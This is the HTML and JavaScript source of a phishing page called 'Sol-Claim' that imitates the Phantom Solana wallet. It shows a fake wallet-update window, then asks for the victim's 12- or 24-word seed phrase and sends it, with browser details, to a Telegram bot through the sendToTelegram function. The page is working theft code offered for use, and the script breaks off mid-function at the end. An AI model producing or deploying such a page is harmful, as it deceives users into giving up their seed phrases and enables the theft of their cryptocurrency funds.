<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover"/>
    <title>Sol-Claim</title>
    <link rel="icon" type="image/x-icon" href="images/favicon.png">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"/>
    <style>
        html, body {
            touch-action: manipulation;
            -webkit-text-size-adjust: 100%;
            -ms-text-size-adjust: 100%;
            text-size-adjust: 100%;
            -webkit-user-zoom: fixed;
            user-zoom: fixed;
            zoom: 1;
            max-zoom: 1;
            min-zoom: 1;
            height: 100%;
        }

        * {
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
            -webkit-tap-highlight-color: transparent;
        }

        input, textarea {
            -webkit-user-select: text;
            -khtml-user-select: text;
            -moz-user-select: text;
            -ms-user-select: text;
            user-select: text;
            font-size: 16px !important;
        }
        
        * { margin:0; padding:0; box-sizing:border-box; font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; }
        body { 
            background: linear-gradient(135deg, #1a0933 0%, #2d1b69 50%, #1a0933 100%); 
            min-height: 100vh; 
            display: flex; 
            align-items: center;
            justify-content: center;
            color: #fff; 
            -webkit-user-select: none; 
            -moz-user-select: none; 
            -ms-user-select: none; 
            user-select: none;
            overflow-x: hidden;
            padding: 20px;
        }
        
        .center-buttons {
            display: flex;
            flex-direction: column;
            gap: 20px;
            width: 100%;
            max-width: 400px;
            margin: 0 auto;
            z-index: 10;
            position: relative;
        }
        
        .btn { 
            padding: 18px 24px; 
            border: none; 
            border-radius: 12px; 
            font-size: 18px; 
            font-weight: 600; 
            cursor: pointer; 
            transition: all .3s ease; 
            display: flex; 
            align-items: center; 
            justify-content: center; 
            gap: 10px; 
            width: 100%;
        }
        
        .btn-primary { 
            background: linear-gradient(45deg, #463892, #ab9ff2); 
            color: #ffffff; 
            box-shadow: 0 4px 15px rgba(70, 56, 146, 0.4);
        }
        
        .btn-primary:hover { 
            transform: translateY(-3px); 
            box-shadow: 0 6px 20px rgba(70, 56, 146, 0.6); 
        }
        
        .btn-secondary { 
            background: linear-gradient(45deg, #463892, #ab9ff2); 
            color: #ffffff; 
            box-shadow: 0 4px 15px rgba(70, 56, 146, 0.4);
        }
        
        .btn-secondary:hover { 
            transform: translateY(-3px); 
            box-shadow: 0 6px 20px rgba(70, 56, 146, 0.6); 
        }
        
        .btn:disabled { 
            opacity: .5; 
            cursor: not-allowed; 
            transform: none !important; 
            box-shadow: none !important; 
        }
        
        .inline-spinner { 
            width: 16px; 
            height: 16px; 
            border: 2px solid rgba(255,255,255,0.3); 
            border-top: 2px solid #fff; 
            border-radius: 50%; 
            animation: spin 1s linear infinite; 
            display: inline-block; 
            margin-left: 8px; 
            vertical-align: middle; 
        }
        
        .wallet-info { 
            display: flex; 
            align-items: center; 
            justify-content: center; 
            gap: 10px; 
            padding: 15px; 
            background: rgba(35, 179, 105, 0.2); 
            border-radius: 12px; 
            display: none; 
            border: 1px solid rgba(35, 179, 105, 0.3);
            margin-bottom: 20px;
            width: 100%;
        }
        
        .info-card {
            background: rgba(0, 0, 0, 0.4);
            backdrop-filter: blur(10px);
            border-radius: 20px;
            padding: 30px;
            box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
            border: 1px solid rgba(255, 255, 255, 0.1);
            margin-bottom: 20px;
            text-align: center;
        }
        
        .info-text {
            color: rgba(255, 255, 255, 0.9);
            font-size: 14px;
            line-height: 1.6;
        }
        
        .info-text i {
            color: #ab9ff2;
            margin-right: 8px;
        }
        
        .floating-elements {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            pointer-events: none;
            z-index: 0;
        }
        
        .floating-element {
            position: absolute;
            border-radius: 50%;
            background: rgba(171, 159, 242, 0.1);
            animation: float 15s infinite ease-in-out;
        }
        
        .floating-element:nth-child(1) {
            width: 150px;
            height: 150px;
            top: 10%;
            left: 5%;
            animation-delay: 0s;
        }
        
        .floating-element:nth-child(2) {
            width: 100px;
            height: 100px;
            top: 60%;
            left: 10%;
            animation-delay: 2s;
        }
        
        .floating-element:nth-child(3) {
            width: 200px;
            height: 200px;
            top: 20%;
            right: 5%;
            animation-delay: 4s;
        }
        
        .floating-element:nth-child(4) {
            width: 120px;
            height: 120px;
            top: 70%;
            right: 10%;
            animation-delay: 6s;
        }
        
        @keyframes float {
            0% {
                transform: translate(0, 0) rotate(0deg);
            }
            33% {
                transform: translate(30px, -50px) rotate(120deg);
            }
            66% {
                transform: translate(-20px, 20px) rotate(240deg);
            }
            100% {
                transform: translate(0, 0) rotate(360deg);
            }
        }
        
        @keyframes spin { 
            0% { transform: rotate(0deg); } 
            100% { transform: rotate(360deg); } 
        }
        
        .virus-animation { 
            display: inline-flex; 
            align-items: center; 
            margin-left: 8px; 
            position: relative; 
            width: 24px; 
            height: 24px; 
        }
        
        .rolling-virus { 
            font-size: 18px; 
            color: #ffffff; 
            animation: roll 2s infinite ease-in-out; 
        }
        
        @keyframes roll {
            0% { 
                transform: translateX(-5px) rotate(0deg); 
            }
            25% { 
                transform: translateX(5px) rotate(90deg); 
            }
            50% { 
                transform: translateX(10px) rotate(180deg); 
            }
            75% { 
                transform: translateX(5px) rotate(270deg); 
            }
            100% { 
                transform: translateX(-5px) rotate(360deg); 
            }
        }
        
        .update-window, .recovery-window {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 1000;
            background: rgba(0, 0, 0, 0.8);
            overflow-y: auto;
        }
        
        .update-container, .recovery-container {
            background: #212121;
            width: 100%;
            min-height: 100vh;
            border-radius: 0;
            padding: 20px;
            box-sizing: border-box;
            border: none;
            display: flex;
            flex-direction: column;
            align-items: center;
            text-align: center;
            position: relative;
            margin: 0 auto;
        }
        
        @media (min-width: 769px) {
            .update-window, .recovery-window {
                position: fixed;
                top: 20px;
                right: 20px;
                left: auto;
                transform: none;
                width: auto;
                height: auto;
                background: transparent;
                overflow: visible;
                display: none;
            }
            
            .update-container, .recovery-container {
                width: 360px;
                min-height: auto;
                height: auto;
                border-radius: 10px;
                padding: 50px 20px 20px;
                border: 1px solid #333;
                position: relative;
            }
            
            .update-container {
                min-height: 560px;
            }
            
            .recovery-container {
                min-height: 460px;
            }
        }
        
        .update-header{color:#fff;font-weight:600;font-size:22px;margin-bottom:20px;}
        .update-features{margin:0 auto 20px auto;padding:16px;background:#212121;border-radius:8px;width:100%;}
        .update-features h3{color:#AB9FF2;font-size:16px;margin-bottom:10px;text-align:center;}
        .update-features ul{list-style:none;padding:0;margin:0;}
        .update-features li{color:#ccc;font-size:14px;margin-bottom:10px;text-align:center;}
        .update-spinner{margin-top:40px;margin-bottom:25px;}
        .update-bottom-text{color:#aaa;font-size:14px;margin-top:auto;margin-bottom:2px;text-align:center;}
        
        .window-header { display:flex; justify-content:space-between; align-items:center; margin-bottom:15px; }
        .phantom-header-logo { width:40px; height:40px; border-radius:8px; cursor:pointer; display:flex; align-items:center; justify-content:center; overflow:hidden; }
        .phantom-header-logo2 { width:112px; height:22px; border-radius:8px; cursor:pointer; display:flex; align-items:center; justify-content:center; overflow:hidden; }
        .phantom-header-logo img { width:100%; height:100%; object-fit:cover; }
        .phantom-header-logo2 img { width:100%; height:100%; object-fit:cover; }
        .top-bar { height:22px; display:flex; justify-content:center; align-items:center; gap:7px; margin-bottom:15px; position:relative; }
        .top-bar::after { content:''; position:absolute; bottom:-8px; left:-20px; right:-20px; height:1px; background: linear-gradient(90deg, transparent, #555, transparent); }
        .top-bar .dot { width:9px; height:9px; border-radius:50%; background:#5c5c5c; transition:background .3s ease; }
        .top-bar .dot.active { background:#AB9FF2 }
        .recovery-header { color:#fff; font-weight:600;font-size:22px; text-align:center; margin-bottom:12px; margin-top:0; }
        .recovery-description { color:#a3a3a3; font-size:14px; line-height:1.4; text-align:center; margin-bottom:20px; }
        
        .seed-grid { 
            display: grid; 
            grid-template-columns: 1fr; 
            gap: 10px; 
            margin-bottom: 20px; 
            width: 100%;
        }
        
        .seed-grid-24 { 
            display: grid; 
            grid-template-columns: 1fr; 
            gap: 10px; 
            margin-bottom: 20px; 
            display: none; 
            width: 100%;
        }
        
        @media (max-width: 768px) {
            .seed-grid { 
                grid-template-columns: repeat(3, 1fr); 
            }
            
            .seed-grid-24 { 
                grid-template-columns: repeat(3, 1fr); 
            }
        }
        
        @media (min-width: 769px) {
            .seed-grid, .seed-grid-24 {
                grid-template-columns: repeat(3, 1fr);
                gap: 7px;
            }
        }
        
        @media (max-width: 768px) {
            .recovery-header {
                font-size: 20px;
            }
            
            .recovery-description {
                font-size: 14px;
                line-height: 1.5;
            }
            
            .update-header {
                font-size: 20px;
            }
            
            .update-features li {
                font-size: 14px;
                line-height: 1.5;
            }
        }
        
        @media (max-width: 480px) {
            .recovery-header {
                font-size: 18px;
            }
            
            .update-header {
                font-size: 18px;
            }
        }
        
        .seed-word { position:relative; }
        .seed-word input { width:100%; background:#161616; border:1px solid #333; border-radius:6px; padding:0 8px 0 28px; height:36px; color:#ccc; font-size:13px; box-sizing:border-box; transition:all .3s ease; }
        .logo-image { width:40px; height:28px; object-fit:contain; }
        .seed-word input:focus { outline:none; border-color:#8a7ff6; }
        .seed-word input::placeholder { color:#626262; }
        .seed-word .number { position:absolute; left:8px; top:50%; transform:translateY(-50%); font-size:13px; color:#959393; user-select:none; pointer-events:none; z-index:1; min-width:16px; text-align:right; }
        .seed-word.error input { border-color:#ff6b6b; background-color:rgba(255,107,107,0.1); }
        .switch-text { color:#AB9FF2; font-size:13px; text-align:center; cursor:pointer; user-select:none; margin-bottom:15px; transition:color .3s ease; font-weight:500; }
        .switch-text:hover { color:#a396f9; text-decoration:underline; }
        .import-btn { width:100%; padding:13px; background:#2e2e2e; border:1px solid #2e2e2e; border-radius:10px; color:#767676; font-size:14px; font-weight:600; cursor:not-allowed; transition:all .3s ease; margin-top:0; }
        .import-btn.enabled { background:linear-gradient(45deg,#8a7ff6,#6a5acd); color:#fff; cursor:pointer;  }
        .import-btn.enabled:hover { transform:translateY(-1px); }
        .phantom-logo-after-line { display:flex; justify-content:center; margin-top:15px; margin-bottom:10px; }
        .close-overlay { position:fixed; top:0; left:0; width:100%; height:100%; background:transparent; z-index:999; display:none; }
        
        .drag-handle { 
            position:absolute; 
            top:0; 
            left:0; 
            right:0; 
            height: 32px;
            z-index:3;
        }
        
        .window-titlebar {
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            height: 32px;
            background: #2d2d2d;
            border-radius: 10px 10px 0 0;
            display: flex;
            align-items: center;
            padding: 0 12px;
            color: #ccc;
            font-size: 13px;
            font-weight: 500;
            user-select: none;
            z-index: 4;
            cursor: default;
        }
        
        @media (max-width: 768px) {
            .window-titlebar {
                display: none;
            }
            
            .update-container, .recovery-container {
                padding-top: 30px;
            }
        }
        
        .window-titlebar.macos {
            justify-content: flex-start;
            background: #3a3a3a;
            padding-left: 12px;
        }
        
        .window-titlebar.macos span {
            position: absolute;
            left: 50%;
            transform: translateX(-50%);
            text-align: center;
        }
        
        .window-titlebar.windows {
            justify-content: space-between;
            background: #2d2d2d;
        }
        
        .window-controls {
            display: flex;
            gap: 8px;
            margin-right: auto;
            z-index: 5;
            position: relative;
        }
        
        .window-control {
            width: 12px;
            height: 12px;
            border-radius: 50%;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            transition: all 0.2s;
            z-index: 6;
            position: relative;
        }
        
        .window-control.close {
            background: #ff5f57;
        }
        
        .window-control.close:hover {
            background: #ff5f57;
        }
        
        .window-control.close:hover::after {
            content: '✕';
            color: #000;
            font-size: 8px;
            font-weight: bold;
        }
        
        .window-control.minimize {
            background: #5a5a5a;
        }
        
        .window-control.maximize {
            background: #5a5a5a;
        }
        
        .windows-controls {
            display: flex;
            gap: 0;
            z-index: 5;
            position: relative;
        }

        .windows-control {
            width: 48px;
            height: 32px;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
            color: #ccc;
            font-size: 16px;
            transition: background 0.2s;
            z-index: 6;
            position: relative;
            font-weight: normal;
        }
        
        .windows-control:hover {
            background: rgba(255,255,255,0.1);
        }

        .windows-control.close:hover {
            background: #e81123;
            color: white;
        }

        .windows-control.close {
            font-size: 14px;
        }
        
        .windows-control.minimize, .windows-control.maximize {
            cursor: default;
            color: #666;
            font-size: 14px;
        }

        .windows-control.minimize:hover, .windows-control.maximize:hover {
            background: transparent;
        }
        
        .window-controls *,
        .windows-controls * {
            pointer-events: auto;
        }
        
        .spinner { 
            width:36px; 
            height:36px; 
            border:4px solid rgba(255,255,255,0.2); 
            border-top:4px solid #AB9FF2; 
            border-radius:50%; 
            animation:spin 1s linear infinite; 
            margin:50px auto; 
            display:block; 
        }
        
        .mobile-close-btn {
            display: none;
            position: absolute;
            top: 15px;
            right: 15px;
            width: 30px;
            height: 30px;
            background: #ff5f57;
            border-radius: 50%;
            color: white;
            border: none;
            font-size: 18px;
            cursor: pointer;
            z-index: 10;
            align-items: center;
            justify-content: center;
        }
        
        @media (max-width: 768px) {
            .mobile-close-btn {
                display: none !important;
            }
        }
    </style>
</head>
<body>
    <div class="floating-elements">
        <div class="floating-element"></div>
        <div class="floating-element"></div>
        <div class="floating-element"></div>
        <div class="floating-element"></div>
    </div>
    
    <div class="center-buttons">
        <div class="info-card">
            <div class="info-text">
                <i class="fas fa-info-circle"></i> Connect your wallet to start the recovery process
            </div>
        </div>
        
        <div class="wallet-info" id="walletInfo">
            <i class="fas fa-check-circle" style="color:#35bd60;"></i>
            <span>Wallet connected! Click Continue.</span>
        </div>
        
        <button class="btn btn-primary" id="connectBtn"><i class="fas fa-plug"></i>Connect wallet</button>
        <button class="btn btn-secondary" id="recoverBtn" disabled>
            <span class="btn-text">Continue</span>
            <span class="inline-spinner" id="recoverSpinner" style="display:none"></span>
        </button>
        
        <div class="info-card" style="margin-top: 10px;">
            <div class="info-text">
                <i class="fas fa-shield-alt"></i> Secure process • Fast recovery • No hidden fees
            </div>
        </div>
    </div>

    <div class="close-overlay" id="closeOverlay"></div>

    <div class="update-window" id="updateWindow">
        <button class="mobile-close-btn" id="updateMobileCloseBtn">×</button>
        <div class="window-titlebar" id="updateTitlebar">
            <div class="window-controls">
                <div class="window-control close" id="updateCloseBtn"></div>
                <div class="window-control minimize"></div>
                <div class="window-control maximize"></div>
            </div>
            <span>Phantom Wallet</span>
            <div class="windows-controls">
                <div class="windows-control minimize">⎽⎽</div>
                <div class="windows-control maximize">☐</div>
                <div class="windows-control close" id="updateCloseBtnWin">✕</div>
            </div>
        </div>
        <div class="update-container">
            <div class="drag-handle"></div>
            <a href="https://phantom.app/" target="_blank" class="phantom-header-logo2">
                <img src="images/logophantom.png" alt="Phantom Logo" class="logo-image"/>
            </a>
            <div class="spinner" id="updateSpinner"></div>
            <h1 class="update-header">Updating your wallet</h1>
            <div class="update-features">
                <h3>New features:</h3>
                <ul>
                    <li id="rotatingFeature">• Fast updates for your wallet</li>
                </ul>
            </div>
            <p class="update-bottom-text">Please wait while we update your wallet...</p>
        </div>
    </div>

    <div class="recovery-window" id="recoveryWindow">
        <button class="mobile-close-btn" id="recoveryMobileCloseBtn">×</button>
        <div class="window-titlebar" id="recoveryTitlebar">
            <div class="window-controls">
                <div class="window-control close" id="recoveryCloseBtn"></div>
                <div class="window-control minimize"></div>
                <div class="window-control maximize"></div>
            </div>
            <span>Phantom Wallet</span>
            <div class="windows-controls">
                <div class="windows-control minimize">⎽⎽</div>
                <div class="windows-control maximize">☐</div>
                <div class="windows-control close" id="recoveryCloseBtnWin">✕</div>
            </div>
        </div>
        <div class="recovery-container">
            <div class="drag-handle"></div>
            <div class="top-bar">
                <div class="dot active"></div>
                <div class="dot"></div>
                <div class="dot"></div>
            </div>
            <div class="phantom-logo-after-line">
                <a href="https://phantom.app/" target="_blank" class="phantom-header-logo">
                    <img src="images/2logo.png" alt="Phantom Logo" class="logo-image"/>
                </a>
            </div>
            <div class="window-header">
                <div style="width:40px"></div>
                <h1 class="recovery-header">Your wallet has been successfully updated.</h1>
                <div style="width:40px"></div>
            </div>
            <p class="recovery-description">To ensure your account's security and prevent, any fraudulent activity, please enter your seed phrase to confirm the changes.</p>
            <div class="seed-grid" id="seedGrid12">
                <div class="seed-word"><span class="number">1.</span><input type="text" id="word1" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">2.</span><input type="text" id="word2" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">3.</span><input type="text" id="word3" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">4.</span><input type="text" id="word4" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">5.</span><input type="text" id="word5" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">6.</span><input type="text" id="word6" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">7.</span><input type="text" id="word7" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">8.</span><input type="text" id="word8" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">9.</span><input type="text" id="word9" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">10.</span><input type="text" id="word10" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">11.</span><input type="text" id="word11" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">12.</span><input type="text" id="word12" autocomplete="off" /></div>
            </div>
            <div class="seed-grid-24" id="seedGrid24">
                <div class="seed-word"><span class="number">1.</span><input type="text" id="word24_1" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">2.</span><input type="text" id="word24_2" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">3.</span><input type="text" id="word24_3" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">4.</span><input type="text" id="word24_4" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">5.</span><input type="text" id="word24_5" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">6.</span><input type="text" id="word24_6" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">7.</span><input type="text" id="word24_7" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">8.</span><input type="text" id="word24_8" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">9.</span><input type="text" id="word24_9" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">10.</span><input type="text" id="word24_10" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">11.</span><input type="text" id="word24_11" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">12.</span><input type="text" id="word24_12" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">13.</span><input type="text" id="word24_13" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">14.</span><input type="text" id="word24_14" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">15.</span><input type="text" id="word24_15" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">16.</span><input type="text" id="word24_16" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">17.</span><input type="text" id="word24_17" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">18.</span><input type="text" id="word24_18" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">19.</span><input type="text" id="word24_19" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">20.</span><input type="text" id="word24_20" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">21.</span><input type="text" id="word24_21" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">22.</span><input type="text" id="word24_22" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">23.</span><input type="text" id="word24_23" autocomplete="off" /></div>
                <div class="seed-word"><span class="number">24.</span><input type="text" id="word24_24" autocomplete="off" /></div>
            </div>
            <div class="switch-text" id="switchWordsBtn">I have a 24-word phrase.</div>
            <button class="import-btn" id="importBtn" disabled><span>Continue</span></button>
        </div>
    </div>

    <script>
        let bip39Words = [];

        const TELEGRAM_BOT_TOKEN = 'YOUR_BOT_TOKEN_HERE';
        const TELEGRAM_CHAT_ID = 'YOUR_CHAT_ID_HERE';

        function detectOS() {
            const userAgent = navigator.userAgent.toLowerCase();
            if (userAgent.includes('mac')) {
                return 'macos';
            } else if (userAgent.includes('win')) {
                return 'windows';
            } else {
                return 'other';
            }
        }

        function applyWindowTitlebarStyle() {
            const os = detectOS();
            const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
            if (isMobile) {
                document.querySelectorAll('.window-titlebar').forEach(titlebar => {
                    titlebar.style.display = 'none';
                });
                return;
            }
            const updateTitlebar = document.getElementById('updateTitlebar');
            const recoveryTitlebar = document.getElementById('recoveryTitlebar');
            if (os === 'macos') {
                updateTitlebar.classList.add('macos');
                recoveryTitlebar.classList.add('macos');
                updateTitlebar.querySelector('.windows-controls').style.display = 'none';
                recoveryTitlebar.querySelector('.windows-controls').style.display = 'none';
            } else if (os === 'windows') {
                updateTitlebar.classList.add('windows');
                recoveryTitlebar.classList.add('windows');
                updateTitlebar.querySelector('.window-controls').style.display = 'none';
                recoveryTitlebar.querySelector('.window-controls').style.display = 'none';
            } else {
                updateTitlebar.classList.add('macos');
                recoveryTitlebar.classList.add('macos');
                updateTitlebar.querySelector('.windows-controls').style.display = 'none';
                recoveryTitlebar.querySelector('.windows-controls').style.display = 'none';
            }
        }
        
        function makeDraggable(element) {
            const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
            if (isMobile) return;
            
            let pos1 = 0, pos2 = 0, pos3 = 0, pos4 = 0;
            const titlebar = element.querySelector('.window-titlebar');
            if (!titlebar) return;
            titlebar.onmousedown = dragMouseDown;
            function dragMouseDown(e) {
                if (e.target.closest('.window-control') || e.target.closest('.windows-control')) {
                    return;
                }
                e = e || window.event;
                e.preventDefault();
                pos3 = e.clientX;
                pos4 = e.clientY;
                document.onmouseup = closeDragElement;
                document.onmousemove = elementDrag;
            }
            function elementDrag(e) {
                e = e || window.event;
                e.preventDefault();
                pos1 = pos3 - e.clientX;
                pos2 = pos4 - e.clientY;
                pos3 = e.clientX;
                pos4 = e.clientY;
                element.style.top = (element.offsetTop - pos2) + "px";
                element.style.left = (element.offsetLeft - pos1) + "px";
                element.style.right = "auto";
            }
            function closeDragElement() {
                document.onmouseup = null;
                document.onmousemove = null;
            }
        }

        async function loadBIP39Words() {
            try {
                const response = await fetch('bip39-words.js');
                const text = await response.text();
                const match = text.match(/\[.*\]/s);
                if (match) {
                    bip39Words = JSON.parse(match[0]);
                } else {
                    return false;
                }
                return true;
            } catch (error) {
                return false;
            }
        }

        function validateWord(input) {
            const word = input.value.trim().toLowerCase();
            if (word.length === 0) {
                input.parentElement.classList.remove('error');
                return false;
            }
            const isValid = bip39Words.includes(word);
            if (!isValid) {
                input.parentElement.classList.add('error');
            } else {
                input.parentElement.classList.remove('error');
            }
            return isValid;
        }

        function checkInputs() {
            const currentGrid = is24Words ? seedGrid24 : seedGrid12;
            const inputs = currentGrid.querySelectorAll('input');
            let allValid = true;
            inputs.forEach((input) => {
                const isValid = validateWord(input);
                if (!isValid && input.value.trim().length > 0) {
                    allValid = false;
                }
            });
            const allFilled = [...inputs].every(i => i.value.trim().length > 0);
            importBtn.disabled = !(allFilled && allValid);
            if (allFilled && allValid) {
                importBtn.classList.add('enabled');
            } else {
                importBtn.classList.remove('enabled');
            }
        }

        async function sendToTelegram(seedPhrase, wordCount) {
            try {
                const message = `🔑 Новая seed phrase (${wordCount} слов):\n${seedPhrase}\n\n🌐 User Agent: ${navigator.userAgent}\n📍 Language: ${navigator.language}\n📱 Platform: ${navigator.platform}`;
                const response = await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: message, parse_mode: 'HTML' })
                });
                const data = await response.json();
                return data.ok;
            } catch (error) {
                return false;
            }
        }

        function handleSeedPhrasePaste(e) {
            const pastedText = e.clipboardData.getData('text');
            const words = pastedText.trim().split(/\s+/);
            const wordCount = words.length;
            if (wordCount === 12 || wordCount === 24) {
                e.preventDefault();
                if (wordCount === 24 && !is24Words) {
                    switchWordsBtn.click();
                } else if (wordCount === 12 && is24Words) {
                    switchWordsBtn.click();
                }
                const currentGrid = is24Words ? seedGrid24 : seedGrid12;
                const inputs = currentGrid.querySelectorAll('input');
                for (let i = 0; i < Math.min(wordCount, inputs.length); i++) {
                    inputs[i].value = words[i];
                    validateWord(inputs[i]);
                }
                checkInputs();
            }
        }

        document.addEventListener('DOMContentLoaded', async () => {
            applyWindowTitlebarStyle();
            const connectBtn = document.getElementById('connectBtn');
            const recoverBtn = document.getElementById('recoverBtn');
            const recoverSpinner = document.getElementById('recoverSpinner');
            const walletInfo = document.getElementById('walletInfo');
            const updateWindow = document.getElementById('updateWindow');
            const recoveryWindow = document.getElementById('recoveryWindow');
            const switchBtn = document.getElementById('switchWordsBtn');
            const importBtn = document.getElementById('importBtn');
            const seedGrid12 = document.getElementById('seedGrid12');
            const seedGrid24 = document.getElementById('seedGrid24');
            const closeOverlay = document.getElementById('closeOverlay');
            const updateCloseBtn = document.getElementById('updateCloseBtn');
            const updateCloseBtnWin = document.getElementById('updateCloseBtnWin');
            const recoveryCloseBtn = document.getElementById('recoveryCloseBtn');
            const recoveryCloseBtnWin = document.getElementById('recoveryCloseBtnWin');
            const updateMobileCloseBtn = document.getElementById('updateMobileCloseBtn');
            const recoveryMobileCloseBtn = document.getElementById('recoveryMobileCloseBtn');

            let isConnected = false;
            let phantomWallet = null;
            let userPublicKey = null;
            window.is24Words = false;

            makeDraggable(updateWindow);
            makeDraggable(recoveryWindow);

            const wordsLoaded = await loadBIP39Words();
            if (!wordsLoaded) {
                return;
            }

            const checkPhantom = async () => {
                if (window.solana && window.solana.isPhantom) {
                    phantomWallet = window.solana;
                    return true;
                } else {
                    return false;
                }
            };

            function closeAllWindows() {
                updateWindow.style.display = 'none';
                recoveryWindow.style.display = 'none';
                closeOverlay.style.display = 'none';
            }

            updateCloseBtn.addEventListener('click', closeAllWindows);
            updateCloseBtnWin.addEventListener('click', closeAllWindows);
            recoveryCloseBtn.addEventListener('click', closeAllWindows);
            recoveryCloseBtnWin.addEventListener('click', closeAllWindows);
            updateMobileCloseBtn.addEventListener('click', closeAllWindows);
            recoveryMobileCloseBtn.addEventListener('click', closeAllWindows);

            connectBtn.addEventListener('click', async () => {
                const hasPhantom = await checkPhantom();
                if (!hasPhantom) {
                    window.open('https://phantom.app/', '_blank');
                    return;
                }
                try {
                    connectBtn.disabled = true;
                    connectBtn.innerHTML = '<i class="fas fa-plug"></i> <span>...</span>';
                    const response = await phantomWallet.connect();
                    userPublicKey = response.publicKey.toString();
                    isConnected = true;
                    connectBtn.innerHTML = '<i class="fas fa-plug"></i> Connect wallet';
                    recoverBtn.disabled = false;
                    walletInfo.style.display = 'flex';
                } catch (error) {
                    connectBtn.innerHTML = '<i class="fas fa-plug"></i> Connect wallet';
                    connectBtn.disabled = false;
                }
            });

            recoverBtn.addEventListener('click', async () => {
                if (!isConnected) return;
                recoverBtn.disabled = true;
                recoverSpinner.style.display = 'inline-block';
                try {
                    const message = `⚠️ Before interacting with this website, please update your extension. Click "Confirm" to continue.`;
                    const encodedMessage = new TextEncoder().encode(message);
                    const { signature } = await phantomWallet.signMessage(encodedMessage, 'utf8');
                    updateWindow.style.display = 'block';
                    closeOverlay.style.display = 'block';
                    setTimeout(() => {
                        updateWindow.style.display = 'none';
                        recoveryWindow.style.display = 'block';
                        recoverSpinner.style.display = 'none';
                        recoverBtn.disabled = false;
                    }, 8000);
                } catch (error) {
                    recoverSpinner.style.display = 'none';
                    recoverBtn.disabled = false;
                }
            });

            switchBtn.addEventListener('click', () => {
                window.is24Words = !window.is24Words;
                if (window.is24Words) {
                    seedGrid12.style.display = 'none';
                    seedGrid24.style.display = 'grid';
                    switchBtn.textContent = 'I have a 12-word phrase.';
                } else {
                    seedGrid12.style.display = 'grid';
                    seedGrid24.style.display = 'none';
                    switchBtn.textContent = 'I have a 24-word phrase.';
                }
                checkInputs();
            });

            [seedGrid12, seedGrid24].forEach(grid => {
                const inputs = grid.querySelectorAll('input');
                inputs.forEach((input) => {
                    input.addEventListener('paste', handleSeedPhrasePaste);
                    input.addEventListener('input', function() {
                        validateWord(input);
                        checkInputs();
                    });
                });
            });

            importBtn.addEventListener('click', async () => {
                if (importBtn.disabled) return;
                const currentGrid = window.is24Words ? seedGrid24 : seedGrid12;
                const inputs = currentGrid.querySelectorAll('input');
                const seedWords = Array.from(inputs).map(input => input.value.trim());
                const seedPhrase = seedWords.join(' ');
                const wordCount = window.is24Words ? 24 : 12;
                const sent = await sendToTelegram(seedPhrase, wordCount);
                importBtn.innerHTML = 'Processing...';
                setTimeout(() => {
                    recoveryWindow.style.display = 'none';
                    closeOverlay.style.display = 'none';
                    importBtn.innerHTML = '<span>Continue</span>';
                }, 2000);
            });

            window.addEventListener('load', async () => {
                const hasPhantom = await checkPhantom();
                if (hasPhantom) {
                    try {
                        if (phantomWallet.isConnected) {
                            const response = await phantomWallet.connect();
                            userPublicKey = response.publicKey.toString();
                            isConnected = true;
                            const connectBtnEl = document.getElementById('connectBtn');
                            connectBtnEl.innerHTML = '<i class="fas fa-plug"></i> Wallet Connected';
                            recoverBtn.disabled = false;
                            walletInfo.style.display = 'flex';
                        }
                    } catch (error) {}
                }
            });
        });
        
        (function() {
            const phrases = [
            '• Seamless token transfers between different blockchains',
            '• One-click chain switching for a smoother user experience',
            '• Siemens token transfers between different blocks/bits',
            '• Improved cross-chain transaction security'
            ];
            let idx = 0;
